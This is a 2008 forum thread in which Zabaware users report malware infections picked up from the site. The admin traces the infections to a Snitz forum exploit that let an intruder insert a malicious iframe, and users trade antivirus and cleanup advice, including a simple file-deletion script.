Zabaware Support Forums
Zabaware Forums => General Discussion => Topic started by: freddy888 on January 23, 2008, 06:10:36 pm
-
Just wanted to warn people that I picked up at least 2 viruses here today. One of them was JS/Psyme.NR, not sure what that does. Also I keep getting the file ~tmp1174.exe which is another virus related file. I repeated my surfing and narrowed it down to the Zabaware site. I believe the viruses downloaded themselves when I I went to the forum page here, or possibly when I clicked on 'Active Topics'. Hard to tell, but they were definatetly from here as I was watching my documents and settings folder as I navigated. Soon as I came here I got the viruses again.
One or both might be trojans. Symptoms are that at least one of them hijacks Internet Explorer and tries to make changes to the shell. I keep getting redirected to dodgy pages and unrelated search pages or results. This makes surfing a pain as the browser just takes you anywhere it feels like.
I can't seem to shift them as they reappear after a reboot. AVG doesn't even spot the #tmp1174.exe so it can do nothing about it.
These virus's are a real pain so watch out.
Perhaps this has something to do with the forum code being switched off ?
-
Possibly. I use Firefox with NoScript, and so far had no warnings of any kind here.
Maybe this is why forum code is off. But html isn't.
I hope Robert won't have to disable posting pics, just disable certain tags, like .exe, .js, etc, like other forums can.
But if he has to, I will understand for security reasons.
It may be coming from google-analytics.com, which I block.[?][?][?][?][?][?]
My theory is why they reappear after reboot, is there is a new program starting up with your computer. If you can identify the program, and stop it from starting up, that may solve it.
But best bet is to run an online scan with Trend Micro.
And download and scan with a program called "Hijack this" and post it on a tech forum for those that are good at analyzing it. Just some ideas.
-
Hi Freddy
I just bought and installed the latest anti virus software last week and I get no warnings of any kind for this site. I did not try to download in pictures though so maybe there might be something attached to one of them.
Bill
-
My Norton Symantec blocks this. It happens every time I try to log on.
It says it is trying to install an update to Adobe flash or shockwave player. I don't remember which. It wants you to enable an active x control so if you get that far, x it out.
Be safe friends and do what it takes to protect yourself and your computer.
-
Hi Freddy.
here is some info about that file:
http://www.prevx.com/filenames/X9262996960045788-X1/~TMP1174.EXE.html
hope it helps.
Jerry[8D]
-
when i chick on forum at zabaware home page when it give a warning i click yes itgo to the all forum . but if i click back on the down arrow get http:/ www.yourxxxblog.blog/js_go_f1.php. if this help you guys. i been a great fan. i didn't put the second / in so it did'nt get on this message.may can delet
-
Thanks for the help guys, it's much appreciated [:)]
Just so you know I managed to remove ~tmp1174.exe but when I came back here just now I got it again, so the virus is still active here. I noticed it downloaded as I entered the forum and it froze my pc for a bit. I managed to stop it altering Internet Explorer this time though as I have installed SpyBot Search and Destroy. I'm not so sure now if they do reappear after reboot, but I'll give 'Hijack This' a go too, thanks Mark.
IE still isn't working properly though, so I may just reinstall everything and update my virus software.
dgher1, yes I think I got that too, it looks familiar. Mostly it seems to be hijacking search engine results like yahoo and then redirecting to some dodgy looking search pages when you click on the results. This renders the main search engines useless.
TedAtHome, yes I have had that Active X request too, I denied it though too, which I think was wise.
Seems to me that some idiot has dropped a few viruses here. Pain in the Royal A** !
-
quote:
Originally posted by onthecuttingedge2005
Hi Freddy.
here is some info about that file:
http://www.prevx.com/filenames/X9262996960045788-X1/~TMP1174.EXE.html
hope it helps.
Jerry[8D]
Certainly does Jerry - I can't do any web searchs at the moment so I would never of found it. Looks like a pretty new Virus too...and nasty.
I didn't like this bit :
"The process hooks code into all running processes which could allow it to take control of the system or record keyboard input, mouse activity and screen contents."
-
Hi Freddy.
Some viruses and trojans are persistant and will cripple the ability to delete them, they can also cripple anti-virus installations to prevent a person from installing anything that would compromise the virus or trojan.
if you know what folder the applications are running in you could use a little vbs code I wrote and paste the code into a text file and save it as DeleteFiles.vbs and place it in your startup folder so every time you reboot the vbs file will look for those apps and delete them as your computer starts.
I have used this trick on some computers that were infected which gave me time to install anti-virus software to get rid of the rest of the application in memory.
Set FileSys = CreateObject("Scripting.FileSystemObject")
'Write the file or application name with extension to be deleted here between the quotes
'with the exact root directory
DelFile1 = "C:\Downloads\Some_Unwanted_File1.exe"
DelFile2 = "C:\Downloads\Some_Unwanted_File2.exe"
DelFile3 = "C:\Downloads\Some_Unwanted_File3.exe"
anArray = array(DelFile1,DelFile2,DelFile3)
For Each arrayElement In anArray
If FileSys.FileExists(arrayElement) = True Then FileSys.DeleteFile arrayElement
Next
the above code when activated doesn't ask for permission to delete a file on windows 2000 or below but winXP or Windows vista may prevent it from running so you might have to give the vbs file permission to run.
becareful not to delete any important system files.
I hope it helps.
Jerry[8D]
-
Thanks Jerry, I will bear that in mind, but past experience of removing viruses has left me thinking it is easier and quicker to just reinstall windows and update my virus s/w. There's not much I want to keep on this machine at the moment so it's probably my best option. But I will take note of your code, it's certainly a cunning way to deal with it.
-
I've made sure the virus checker on the Zabaware server is up to date and ran a full system scan. I can't seem to find anything. Can you give me exact URL's where you are getting the virus alert? If there is something wrong it should be visible in the HTML page source itself.
-
Hmmm, I haven't found a virus yet, but the forum config has definetely been tampered with to turn off forum code and allow HTML. I put the settings back in place.
-
quote:
Originally posted by Medeksza
Hmmm, I haven't found a virus yet, but the forum config has definetely been tampered with to turn off forum code and allow HTML. I put the settings back in place.
Hi Rob.
It could of been a hacker, it might be safe to change the servers password to a password that is much stronger, upper, lower case with numbers and at least 12 characters or more long.
a password of 12 or more in length even for a brute force program would take a very long time to crack.
it would take a brute force program about a month to crack, so it might be even safer to change the password every couple of weeks or so.
Jerry[8D]
-
I've got the Norton Internet Security 2008 and even if some cookie or anything gives a little hickup it let's me know, I saw nothing from this site. That should make you feel good Rob. If anything gets blocked or spoken of about this site from my Norton system, I will tell you imediately. I love this site and hope you keep it on for a long long time.
-
I hope everything we be alright from now on.[:D][:D][:D]
-
While some of the AV programs seem to work well not all work quite the same.
I got rid of Norton years ago as it was such a bloated memory hog and it had let a virus (malware, trojan, etc.) into my system that actually turned it off. It wouldn't even let me reboot unless I was connected to the Internet.
The FIRST thing I do with a new computer is install good AV software.
I have been using BitDefender for some time and am quite pleased with it. My friend uses Kaspersky and is likewise pleased with it.
While good AV programs aren't cheap or free, it is money well spent when on considers the consequences of NOT having one!!
BitDefender had a deal: 2 computers for 2 years for $69 USD (that's $17.25 / comp per year) not bad. It also performs update checks once an hour to ensure your system remains up to date.
Scan early and often, use strong passwords as Jerry recommended and change them frequently. Stay away from questionable sites if not sure about their content and don't open any email form someone you don't know (especially attachments).
-
I figured everything out now. It seems there was a pretty large attack on many Snitz forum sites last night: http://forum.snitz.com/forum/topic.asp?TOPIC_ID=66357
Basically this hacker created a username "All4You" on this forum and using the exploit above made himself admin of the forum. He added an "iframe" on the forum homepage that pointed to an off-server site that had a virus. This is why my virus scan turned up nothing, since the virus was off-site.
This virus would only load if you use Internet Explorer and have not run an Windows Update in a while. Firefox, Opera, and up to date Internet Explorer would be ok. If you have an up to date virus checker, you should be ok also. The forum was compromised from 5:23 PM January 23 until 1:31 PM January 24. If you are unsure, please get an up to date virus checker and run a full scan.
I appologize for anyone affected and thank you for bringing this to my attention.
-
Man, Robert, you just amaze me being able to find that out so quickly. You must be very knowledgeable on this type of stuff. If I need any code questions answered I know who to ask now. Great job and great detective work.
-
I agree. People need to remember to keep their Operating systems updated. This affected those who did not have the latest updates, according to what I've read. That, and a good Anti-Virus, Anti-Spyware program is crucial.
I also use Firefox, with NoScript for most surfing. I only allow scripts from sites I trust. Any 2nd party scripts are blocked. (I realize Firefox does not work on all sites, nor with Haptek player *at least I cannot get it to work*, but those are the exceptions)
I haven't got a nasty virus in years (knock on wood) because I know how to protect myself. I never open spam emails. And if I do, I disable html, and only allow text.[:D][:D][:D][:D]
-
if i see something ilet you know too.don't much but i keep good updates.
-
Nice work Rob. [8D] My antivirus is now up to date. Handily enough for me I was planning a completely fresh install of Windows anyway, so for me there was a silver lining to the cloud. Many thanks.